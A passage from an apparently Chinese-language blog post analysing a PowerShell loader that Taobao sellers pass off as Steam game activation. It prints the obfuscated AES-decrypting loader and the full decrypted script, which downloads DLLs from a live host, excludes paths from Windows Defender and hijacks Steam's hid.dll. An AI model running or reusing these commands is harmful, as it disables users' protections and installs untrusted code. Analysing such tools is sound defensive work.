jInS6d+6yt11wZ1zzdyIfWngQCEnxEHi8RtTS3uvbXYEO4YGM/JWSl3hOOlU2D1uwNm8x7xyynP/PW1is3/Afp5njgckMdRi1SGccQxSrIkvRrbB8klrP2nwnBAIZmQgBXD6fQUxAo0gArFM9B4XzEPFoKxEv4LLSJ+KLKffferYa39uCMI9A0YDecL0QNmVnMUe2aBQ0SwwUa1FO0ZqZE7cCU9ujxUEg/+0D8")
$bmoyqc = [System.Convert]::FromBase64String("UA2KbGiLuLYKGNKXp0I85SK9AD1BOac/a0nGz4Bc9Zs=")
$hjfmpy = New-Object "System.Security.Cryptography.AesManaged"
$hjfmpy.Mode = [System.Security.Cryptography.CipherMode]::ECB
$hjfmpy.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$hjfmpy.BlockSize = 128
$hjfmpy.KeySize = 128
$hjfmpy.Key = $bmoyqc
$hjfmpy.IV = $vzwnbqd[0..15]
$nczb = New-Object System.IO.MemoryStream
$wvpqm = New-Object System.IO.MemoryStream(,$hjfmpy.CreateDecryptor().TransformFinalBlock($vzwnbqd,16,$vzwnbqd.Length-16))
$jcaibsx = New-Object System.IO.Compression.DeflateStream $wvpqm, ([IO.Compression.CompressionMode]::Decompress)
$jcaibsx.CopyTo($nczb)
$hjfmpy.Dispose()
$jcaibsx.Close()
$wvpqm.Close()
$wvreq = [System.Text.Encoding]::UTF8.GetString($nczb.ToArray())
Invoke-Expression($wvreq)
三层AES加密,解开后得到
cls
Write-Host -NoNewline " _____ _____ _____ _____ _____ `r" -ForegroundColor:blue
Write-Host -NoNewline " /\ \ /\ \ /\ \ /\ \ /\ \ `r" -ForegroundColor:blue
Write-Host -NoNewline " /::\ \ /::\ \ /::\ \ /::\ \ /::\____\ `r" -ForegroundColor:blue
Write-Host -NoNewline " /::::\ \ \:::\ \ /::::\ \ /::::\ \ /::::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " /::::::\ \ \:::\ \ /::::::\ \ /::::::\ \ /:::::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " /:::/\:::\ \ \:::\ \ /:::/\:::\ \ /:::/\:::\ \ /::::::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " /:::/__\:::\ \ \:::\ \ /:::/__\:::\ \ /:::/__\:::\ \ /:::/|::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ \:::\ \ /::::\ \ /::::\ \:::\ \ /::::\ \:::\ \ /:::/ |::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " ___\:::\ \:::\ \ /::::::\ \ /::::::\ \:::\ \ /::::::\ \:::\ \ /:::/ |::|___|______ `r" -ForegroundColor:blue
Write-Host -NoNewline " /\ \:::\ \:::\ \ /:::/\:::\ \ /:::/\:::\ \:::\ \ /:::/\:::\ \:::\ \ /:::/ |::::::::\ \ `r" -ForegroundColor:blue
Write-Host -NoNewline "/::\ \:::\ \:::\____\ /:::/ \:::\____\/:::/__\:::\ \:::\____\/:::/ \:::\ \:::\____\/:::/ |:::::::::\____\`r" -ForegroundColor:blue
Write-Host -NoNewline "\:::\ \:::\ \::/ / /:::/ \::/ /\:::\ \:::\ \::/ /\::/ \:::\ /:::/ /\::/ / ~~~~~/:::/ /`r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ \:::\ \/____/ /:::/ / \/____/ \:::\ \:::\ \/____/ \/____/ \:::\/:::/ / \/____/ /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ \:::\ \ /:::/ / \:::\ \:::\ \ \::::::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ \:::\____\ /:::/ / \:::\ \:::\____\ \::::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ /:::/ / \::/ / \:::\ \::/ / /:::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\/:::/ / \/____/ \:::\ \/____/ /:::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \::::::/ / \:::\ \ /:::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \::::/ / \:::\____\ /:::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \::/ / \::/ / \::/ / \::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \/____/ \/____/ \/____/ \/____/ `r" -ForegroundColor:bluefunction Get-RandomString() {
param(
[int]$length=10,
# 这里的[int]是类型指定
[char[]]$sourcedata
)for($loop=1; $loop -le $length; $loop++) {
$TempPassword+=($sourcedata | GET-RANDOM | %{[char]$_})
}return $TempPassword
}Start-Sleep 1
$tempLog = $env:TEMP+ "\log.txt"try{
irm -Uri "https://hz-config.oss-accelerate.aliyuncs.com/help.txt" -OutFile $tempLog
}
catch{
Write-Host "NetWork Result-Error" -ForegroundColor:red
}function PwStart() {
try
{
$steamPath = (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Valve\Steam\ActiveProcess" -ErrorAction Stop).'SteamClientDll'
$steamPath = $steamPath -replace "steamclient.dll","hid.dll"if(Get-Process 360Tray* -ErrorAction Stop){
while(Get-Process 360Tray* -ErrorAction Stop){
Write-Host (Get-Content $tempLog)[0] -ForegroundColor:Red
Start-Sleep 1.5
}
PwStart}
elseif(Get-Process 360sd* -ErrorAction Stop)
{
while(Get-Process 360sd* -ErrorAction Stop){
Write-Host (Get-Content $tempLog)[1] -ForegroundColor:Red
Start-Sleep 1.5
}
PwStart
}
else{
try{
Stop-Process -Name steam* -Force -ErrorAction Stop
Start-Sleep 1
#避免退出失败多检测一次
if(Get-Process steam* -ErrorAction Stop){
TASKKILL /F /IM "steam.exe" | Out-Null
Start-Sleep 2
}
#没有检测到杀毒的存在可以开始执行下一步
if (Test-Path $steamPath) {
Start-Sleep 1
del $steamPath
if (Test-Path $steamPath)
{
Remove-Item -Path $steamPath -Force
Start-Sleep 1
}
Start-Sleep 0.5
}
$steamPath = $steamPath -replace "hid.dll","version.dll"
if (Test-Path $steamPath) {
Start-Sleep 0.5
Remove-Item -Path $steamPath -Force
Start-Sleep 0.5
}
$steamPath = $steamPath -replace "version.dll","user32.dll"
if (Test-Path $steamPath) {
Start-Sleep 0.5
Remove-Item -Path $steamPath -Force
Start-Sleep 0.5
}
$steamPath = $steamPath -replace "user32.dll","hid.dll"Write-Host "ServerStart [OK]" -ForegroundColor:green
try
{
Add-MpPreference -ExclusionPath $steamPath
Set-MpPreference -SubmitSamplesConsent 0
}
catch
{
}
Write-Host "Result[0] [OK]" -ForegroundColor:greenInvoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/PSH" -OutFile $steamPath -ErrorAction Stop
Write-Host "Result[1] [OK]" -ForegroundColor:green
$strfmt = -join ($env:LOCALAPPDATA,"\SteamActive")
if (!(Test-Path $strfmt)) {
md $strfmt | Out-Null
Start-Sleep 1
if (!(Test-Path $strfmt)) {
New-Item $strfmt -ItemType directory -Force | Out-Null
}
}$strfmt = -join ($env:LOCALAPPDATA,"\SteamActive\hid")
Invoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/hid" -OutFile $strfmt -ErrorAction Stop
Write-Host "Result[2] [OK]" -ForegroundColor:greenStart-Sleep 0.5
Start steam://
#连接服务器成功请在Steam输入激活码 5秒后自动关闭窗口
Write-Host (Get-Content $tempLog)[3] -ForegroundColor:greenStart-Sleep 5
#结束运行
exit
}
catch
{
#请重新打开Power shell 打开方式以管理员身份运行
Write-Host (Get-Content $tempLog)[2] -ForegroundColor:Red
}}
}
catch{
#请检查您的Steam是否正确安装
Write-Host (Get-Content $tempLog)[4] -ForegroundColor:red
}
}#开始启动
PwStart
这个命令执行了:
- 从网上下载了一个脚本下来执行
- 脚本加了三重AES加密[为了保护作者的母亲]
- 设置Windows Defender除外Steam目录下的安全防护
- 关闭360等杀毒软件进程
- 删除steam目录下几个dll文件
- 从网上下载hid.dll覆盖到steam的本地目录
- 以及还下了其他用于破解的库
hid.dll是个系统的动态库,hid的缩写是Human Interface Device的简称,简单点说就是控制鼠标键盘之类的用户输入设备的。这玩意放在这里通常是为了让Steam在处理输入设备时先过一次他的拦截,然后再传到系统执行正常操作
steamworks.exe行为分析
它下载的exe文件在微步沙箱也是成功报毒
他所替换的文件可以使商家远程修改你的文件,可能导致你退款就销毁你的steam等....
运行它下载的steamworks.exe文件会强制退出steam平台的进程
接着steamworks.exe释放python支持库和几张输入产品代码的图片到临时文件夹中
程序执行几秒后弹出界面
由于此时steam已强制退出,不难猜到该界面正是刚刚提到的临时文件夹中的图片绘制而成
将某宝店家提供给我们的CDK提交,发现通过网络下载了文件111111.zip
通过steamdb查询我们要激活的游戏123,发现123的ID正是111111
解压后得到其中包含了游戏的清单文件和密钥文件
其中包含了游戏的清单文件和密钥文件
猜测是由steam免费入库工具SteamTools生成
显然店家提供给我们的"游戏CDK"实际上是游戏的标识ID,通过该ID下载对应的游戏免费入库包
接着steamworks.exe将TEVI的清单文件拷贝到steam目录下的depotcache文件夹中,并且修改了包括config.vdf在内的一部分配置文件
然后在steam目录下写入一个User32.dll
User32.dll行为分析
显然User32.dll是为了劫持注入,在IDA中查看发现具有GreenLuma字符串
通过搜索引擎查找GreenLuma,发现这也是一个steam入库工具
显然steamworks.exe通过GreenLuma进行劫持注入,通过之前得到的游戏的清单文件和密钥文件进行解锁
最后,弹出激活成功的窗口并重启steam
评论一下?